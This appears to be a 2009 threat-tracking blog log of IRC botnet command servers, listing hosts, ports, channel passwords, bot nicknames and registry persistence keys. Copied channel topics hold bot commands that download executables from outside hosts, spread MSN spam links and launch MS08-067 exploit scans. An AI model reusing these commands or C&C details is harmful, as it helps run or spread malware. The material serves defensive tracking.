Saturday, September 12, 2009

nhg1.cjb.net ( msn )

212.116.225.118 6667, 4244

Channel: #!N!#
.download http://photophoto.com.ar/photo.exe C:/aha.exe 1
.msn.msg Estat Photo so Tuos ? http://photophoto.com.ar/msn.exe?=

Autostartpath
LM\Software\Microsoft\Windows\CurrentVersion\Run\
Windows UDP Control Center = winudpmgr.exe
C:\WINDOWS\winudpmgr.exe

64.127.41.211 ( Johnny_Demonik ) ( H4CK3D.US )

64.127.41.211 6667

USERHOST [00|USA|XP|SP3]-4698
MODE [00|USA|XP|SP3]-4698 -x+iB
JOIN #D3v|lz password: D3v|lz666
.download http://shells.h4ck3d.us/Viri/Johnny_Demonik.exe C:\Johnny_Demonik.exe 1

Autostartpath
%System%\regeditv8.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft = "RegEditv8.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
Microsoft = "RegEditv8.exe"
[HKEY_CURRENT_USER\Software\ASProtect]
Microsoft = "RegEditv8.exe"

Friday, September 11, 2009

new.burimche.net ( burimi ) ( NESbot )

*** IP of : 85.248.5.222 host new.burimche.net
85.248.5.222 1212

NICK [solo][USA|XP|16993]
USER NESv5 * 0 :[solo][USA|XP|16993]
Channel:
#buli#
#infochan Topic is '.msn.stop|.msn.msg foto http://www.hi5-ph0tos.com/viewimage.php?='

password:
letmein

Autostartpath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
winsvc32 = winsvc32.exe

218.29.54.25 ( ms08-067 )

218.29.54.25 7384

Nick [00_USA_XP_3338273]
Channel: #sbu
Topic :.asc -S|.http http://89.149.227.51/strang.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r

Autostartpath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
Microsoft Driver Setup = C:\WINDOWS\msvddr32.exe

b1n.th3kings.net

*** IP of : 203.154.27.138 host b1n.th3kings.net
203.154.27.138 27034
JOIN #!!ss!!# password: bbbbbbb
MODE [00|USA|412536] +ix

Autostartpath
LM\Software\Microsoft\Windows\CurrentVersion\Run
javaupdate = "C:\Windows\svchost.exe.exe"

Thursday, September 10, 2009

botnet.byinter.net ( msn and usb )

174.132.181.27 6667
Channel #botnet
Channel: #KCA with Password KCA
Channel Topic for Channel #KCA: ".msn"

Server stats
There are 89 users and 774 invisible on 4 servers
5 operator(s) online
21 unknown connection(s)
23 channels formed
I have 851 clients and 2 servers
-
Current Local Users: 851 Max: 1003
Current Global Users: 863 Max: 1814

Wednesday, September 9, 2009

82.114.87.46 ( msn )

82.114.87.46 1868

MODE [00|USA|920254] -ix
JOIN #!a!

Topic is '.msn.stop|.msn.msg ola! Cette photo est la vĂ´tre? http://galery.ga.ohost.de/photoss.php?='

Autostart path

CU\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite
"C:\Windows\installed.exe"

LM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Shell "Explorer.exe"/"Explorer.exe, C:\Windows\installed.exe"
LM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userini
"C:\WINDOWS\system32\userinit.exe,"/"C:\WINDOWS\system32\userinit.exe, C:\Windows\installed.exe"

Tuesday, September 8, 2009

lovings.technigoyous.net ( MS08-067 )

lovings.technigoyous.net DNS_TYPE_A 125.83.89.212

125.83.89.212:1863
Nick: [N00_AUT_XP_4752491]H\xe8@
Username: SP3-086
Joined Channel: #bb with Password ^B^B^B^B
Channel Topic for Channel #bb: ".asc -S -s |.http http://218.10.17.212/hihi.exe |.asc exp_all 15 5 0 -a -r -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 10 5 0 -c -e |.asc exp_all 3 5 0 -b -r |.asc exp_all 3 5 0 -c"

218.10.17.212:8585 ( MS08-067 )

There are 5520 users and 143 invisible on 1 servers
1 operator(s) online
88 unknown connection(s)
6 channels formed
I have 5663 clients and 0 servers
-
Current Local Users: 5663 Max: 9882
Current Global Users: 5663 Max: 9882

#tony 41 [+mu] .r.getfile http://rapidshare.com/files/276894379/hihi.exe C:\difdhg.exe 1
#petro 7 [+mnMCu] .r.getfile http://rapidshare.com/files/276894379/hihi.exe C:\sidh.exe 1
#tanker 5468 [+mMu] .asc -S|.http http://218.10.17.212/cakar.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r
#new 71 [+mu]
#sucker 18 [+mu]

Thursday, September 3, 2009

174-143-210-150.static.cloud-ips.com ( ms08-067 ) ( J )

174.143.210.150:80

JOIN #xx10
MODE [00_USA_XP_7029018] -ix
IDENT SP3-191
USERNAME Peter

Topic is '.asc -S -s |.http http://94.76.194.116/xx10.exe |.asc exp_all 15 5 0 -a -r -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 10 5 0 -c -e |.asc exp_all 3 5 0 -b -r |.asc exp_all 3 5 0 -c |.down -S |.down http://94.76.194.116/brown.jpg c:\b2k8o4l4q3z1.exe c:\b2k8o4l4q3z1.exe -r -h'

Autostart path
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​
Microsoft Driver Setup = C:\​WINDOWS\​system32\​drivers\​explorer.exe
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​policies\​Explorer\​Run\​
Microsoft Driver Setup =C:\​WINDOWS\​system32\​drivers\​explorer.exe


Powered by Blogger